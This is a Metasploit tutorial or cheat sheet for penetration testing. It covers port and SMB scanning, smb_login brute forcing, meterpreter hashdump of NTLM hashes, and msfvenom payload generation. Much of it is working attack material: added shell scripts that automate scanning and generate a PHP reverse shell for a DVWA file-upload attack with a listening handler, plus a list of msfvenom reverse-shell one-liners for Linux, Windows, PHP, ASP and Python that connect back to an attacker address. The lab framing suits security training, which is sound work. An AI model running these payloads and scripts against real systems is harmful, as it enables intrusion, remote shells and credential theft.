Metasploit
Tool for scanning, vulnerability assessment and exploitation
Last updated
Metasploit has a number of modules to scan open ports on the target system. Use the command search portscan to list the port scanning modules. The following are common modules to use (all live under auxiliary/scanner/):
portscan/tcp: TCP Port Scanner (full connect scan, works without raw-socket privileges)
portscan/syn: TCP SYN Port Scanner (half-open scan, needs raw sockets, so run as root)
portscan/ack: TCP ACK Firewall Scanner (maps which ports a stateless filter lets through)
It's also possible to run nmap scans directly from the metasploit console.
The scanner/discovery/udp_sweep module quickly identifies services listening on UDP (User Datagram Protocol). It does not probe every possible UDP service, but it is a fast way to spot common ones such as DNS or NetBIOS.
The smb_enumshares and smb_version modules are useful in a corporate network and help enumerate SMB services (versions and shares). Use the smb_login module to brute force known usernames with a password list; repeated failed logins are noisy and can trip account-lockout policies. Warning: This can be very slow, so only use if there's evidence
To organize target information within an engagement, the metasploit database can be used by setting up a PostgreSQL database:
Start PostgreSQL: systemctl start postgresql
Initialize the metasploit database: msfdb init
Start metasploit: msfconsole
Check database status: db_status
Add workspace: workspace -a $WORKSPACE
Once the database is set up, db_nmap can be used to run nmap and save its results straight into the database. The commands hosts and services show what is known about hosts and services on a target system; both accept -R to copy their results into the current module's RHOSTS.
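The database and discovery steps above, combined into one script. This is an added example and not code from the page or from the Metasploit project: it writes a Metasploit resource script that creates the workspace, stores a db_nmap scan, runs the TCP, UDP and SMB scanners discussed above, and then runs it with msfconsole -r. The target range, workspace name and output path are assumptions set through environment variables; the SYN-style db_nmap and msfdb init need root or sudo.

```shell
#!/usr/bin/env bash
# Added example: automate the discovery workflow above with a resource script.
# TARGET, WORKSPACE and RC_OUT are assumptions; override them in the environment.
TARGET="${TARGET:-192.0.2.0/24}"       # constructed sample range
WORKSPACE="${WORKSPACE:-engagement1}"  # sample workspace name
RC_OUT="${RC_OUT:-/tmp/discovery.rc}"

# setup_db: start PostgreSQL and initialise the msf database (needs root/sudo).
setup_db() {
  sudo systemctl start postgresql
  sudo msfdb init
}

# write_scan_rc <target> <workspace> <outfile>
# Emits the msfconsole commands in order: create/select the workspace, store an
# nmap scan in the database, run the TCP and UDP scanners, then aim the SMB
# modules only at hosts the database already shows with port 445 open
# (services -p 445 -R copies those hosts into RHOSTS). Ends with exit so the
# file is suitable for non-interactive use with msfconsole -r.
write_scan_rc() {
  target="$1"; ws="$2"; out="$3"
  cat > "$out" <<EOF
workspace -a $ws
db_nmap -sS -Pn --top-ports 1000 $target
use auxiliary/scanner/portscan/tcp
set RHOSTS $target
set THREADS 10
run
use auxiliary/scanner/discovery/udp_sweep
set RHOSTS $target
run
use auxiliary/scanner/smb/smb_version
services -p 445 -R
run
use auxiliary/scanner/smb/smb_enumshares
services -p 445 -R
run
hosts
services
exit
EOF
}

# run_scan_rc <rcfile>: run the resource script non-interactively.
run_scan_rc() {
  msfconsole -q -r "$1"
}

write_scan_rc "$TARGET" "$WORKSPACE" "$RC_OUT"
echo "wrote $RC_OUT"
if command -v msfdb >/dev/null 2>&1; then
  setup_db
fi
if command -v msfconsole >/dev/null 2>&1; then
  run_scan_rc "$RC_OUT"
else
  echo "msfconsole not found; inspect $RC_OUT and run it with msfconsole -r" >&2
fi
```

Because the .rc file is plain msfconsole input, it can also be loaded from an interactive console with resource /tmp/discovery.rc; drop the trailing exit line in that case. Errors in a resource script do not stop it, so read the output for modules that failed to set RHOSTS (for example when no host has port 445 open).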
Search for exploits using the search command, obtain more information about the exploit using the info command, and launch the exploit using exploit or run. Where a module implements it, check tests whether the target looks vulnerable without firing the exploit. The success of a kill chain heavily relies on a thorough understanding of the services running on the target system.
Use show payloads and set payload to choose a useful payload if a preset default is not present. This is often a trial and error process because of environmental or OS restrictions (architecture, egress filtering, what the target can execute). Use the show options command to show parameters that can be customized. Common parameters include:
RHOSTS: Target system(s)
RPORT: Target port
LHOST: Listening host (the attacker address the payload connects back to)
LPORT: Listening port
PAYLOAD: The payload to execute, e.g. a plain shell or a staged meterpreter
You can background a session using CTRL+Z or abort using CTRL+C. This is very helpful when working on more than one target simultaneously.
The sessions command lists active sessions, and the -i flag selects one of the listed sessions to interact with.
Once in a shell, the shell can sometimes be upgraded to a meterpreter session using the command sessions -u $ID, which is very helpful for managing pivots and post exploitation. Two very useful meterpreter commands are search, for finding files, and hashdump, which dumps NTLM hashes from the SAM (it needs SYSTEM privileges, so run getsystem or another escalation first).
Msfvenom is the metasploit tool used to generate payloads. It can access the payload library and allows full customization of a payload, including format, architecture, target system, encoder and bad characters (-b).
Output formats can be viewed using the msfvenom --list formats command (similarly --list payloads and --list encoders). Encoders can be specified with the -e parameter. The following is an example of a command utilizing msfvenom:
msfvenom -p php/meterpreter/reverse_tcp LHOST=$IP -f raw -e php/base64
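A check a practitioner wants after handing msfvenom a bad-character list with -b: confirm that none of those bytes survived in the output. This is an added example, not code from the page or the Metasploit project. check_badchars dumps the raw payload one byte per line with od and reports every listed byte it finds; gen_payload shows the matching msfvenom call and only runs when msfvenom is installed. The payload, LHOST, LPORT and output file are assumptions.

```shell
#!/usr/bin/env bash
# Added example: generate a raw payload with bad characters excluded, then
# verify the result. Payload, LHOST/LPORT and the output file are assumptions.
LHOST="${LHOST:-192.0.2.1}"
LPORT="${LPORT:-1337}"
BADCHARS='\x00\x0a\x0d'      # NUL, LF, CR: the usual set for strcpy/gets-style overflows
OUT="${OUT:-shell.bin}"

# check_badchars <file> <badchars>
# <badchars> uses msfvenom's own notation, e.g. '\x00\x0a\x0d'. Dumps the file
# one hex byte per line with od, then looks for each listed byte. Prints every
# offending byte and returns 1 if any is present, 0 if the file is clean.
check_badchars() {
  f="$1"; bad="$2"; found=0
  hex=$(od -An -v -tx1 "$f" | tr ' ' '\n' | grep -v '^$')
  for b in $(printf '%s' "$bad" | sed 's/\\x/ /g'); do
    b=$(printf '%s' "$b" | tr 'A-F' 'a-f')
    if printf '%s\n' "$hex" | grep -qx "$b"; then
      echo "bad byte 0x$b present in $f"
      found=1
    fi
  done
  return "$found"
}

# gen_payload: -b makes msfvenom pick an encoder that avoids the listed bytes;
# -f raw keeps the bytes unwrapped so the check sees exactly what gets injected.
gen_payload() {
  msfvenom -p linux/x86/shell_reverse_tcp LHOST="$LHOST" LPORT="$LPORT" \
    -b "$BADCHARS" -f raw -o "$OUT"
}

if command -v msfvenom >/dev/null 2>&1; then
  gen_payload
  if check_badchars "$OUT" "$BADCHARS"; then
    echo "$OUT is free of $BADCHARS"
  else
    echo "a bad byte survived encoding; try another encoder with -e" >&2
  fi
else
  echo "msfvenom not found; only check_badchars is available" >&2
fi
```

The check is worth running on any format, not only raw shellcode: a -f exe or -f elf output legitimately contains NUL bytes in its headers, so apply it to the raw bytes you will actually place into the vulnerable buffer, and remember that an encoder only guarantees the encoded body, not a decoder stub that it cannot adjust for an impossible character set.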
Handlers are one of the most useful parts of metasploit. Within the metasploit framework this part is handled automatically by an exploit module; when the payload is delivered some other way (an msfvenom file uploaded or run by hand), the exploit/multi/handler module catches the shell coming from the target back to the attacker machine.
The following scenario follows exploiting the file upload vulnerability present in DVWA (Damn Vulnerable Web Application):
Generate the PHP shell using msfvenom (this will need to be modified post generation to add php start and end tags):
msfvenom -p php/reverse_php LHOST=$IP LPORT=1337 -f raw > reverse_shell.php
Start the metasploit handler, setting the payload to the one msfvenom generated so the handler speaks the same protocol:
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD php/reverse_php; set LHOST $IP; set LPORT 1337; run"
Upload and execute the PHP shell; the handler reports the new session.
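The DVWA scenario above carried through in one script. This is an added example, not code from the page or the Metasploit project: it generates the PHP shell, adds the <?php and ?> tags only if they are missing (so the file is never double-wrapped), and starts a multi/handler whose PAYLOAD matches the generated one, as a background job so the console stays usable for sessions. LHOST, LPORT and the output file name are assumptions.

```shell
#!/usr/bin/env bash
# Added example: the DVWA file-upload scenario end to end. LHOST, LPORT and the
# output file name are assumptions; adjust them for the engagement.
LHOST="${LHOST:-192.0.2.1}"      # attacker address the shell connects back to
LPORT="${LPORT:-1337}"
PAYLOAD="php/reverse_php"        # plain PHP reverse shell, no staging needed
OUT="${OUT:-reverse_shell.php}"

# ensure_php_tags <file>
# msfvenom's raw PHP output may lack the <?php ... ?> wrapper the web server
# needs before it will execute the file. Adds it only when absent so the file
# is never double-wrapped. Returns 0 if the file was changed, 1 if left as is.
ensure_php_tags() {
  f="$1"
  if grep -q '<?php' "$f"; then
    return 1
  fi
  tmp=$(mktemp)
  { printf '<?php\n'; cat "$f"; printf '\n?>\n'; } > "$tmp"
  mv "$tmp" "$f"
  return 0
}

# handler_cmd: msfconsole command string that catches the connect-back.
# PAYLOAD must match what msfvenom generated; exploit -j leaves the handler
# running as a job so the console stays free for sessions -l / sessions -i.
handler_cmd() {
  printf 'use exploit/multi/handler; set PAYLOAD %s; set LHOST %s; set LPORT %s; exploit -j' \
    "$PAYLOAD" "$LHOST" "$LPORT"
}

# gen_payload: write the raw PHP shell and fix the tags.
gen_payload() {
  msfvenom -p "$PAYLOAD" LHOST="$LHOST" LPORT="$LPORT" -f raw > "$OUT"
  ensure_php_tags "$OUT" || echo "$OUT already carried PHP tags"
}

if command -v msfvenom >/dev/null 2>&1 && command -v msfconsole >/dev/null 2>&1; then
  gen_payload
  echo "upload $OUT through DVWA's File Upload page, then request it in the browser"
  msfconsole -q -x "$(handler_cmd)"
else
  echo "msfvenom/msfconsole not found; nothing generated" >&2
fi
```

Once the console is up, requesting the uploaded file makes it connect back and the job prints the new session; sessions -i 1 interacts with it and sessions -u 1 attempts the upgrade to meterpreter described above. The same script works for php/meterpreter/reverse_tcp by changing PAYLOAD, since the handler is set from the same variable.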
COMMON EXAMPLES:
Linux 32-bit ELF (Executable and Linkable Format):
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f elf > rev_shell.elf
Windows:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f exe > rev_shell.exe
PHP:
msfvenom -p php/meterpreter_reverse_tcp LHOST=$IP LPORT=1337 -f raw > rev_shell.php
ASP:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=$IP LPORT=1337 -f asp > rev_shell.asp
Python:
msfvenom -p cmd/unix/reverse_python LHOST=$IP LPORT=1337 -f raw > rev_shell.py
All of these examples are reverse payloads and work with the exploit/multi/handler module; in the handler, set PAYLOAD to the exact name given to -p (a staged meterpreter/reverse_tcp and a stageless meterpreter_reverse_tcp are different payloads) and LHOST/LPORT to the same values.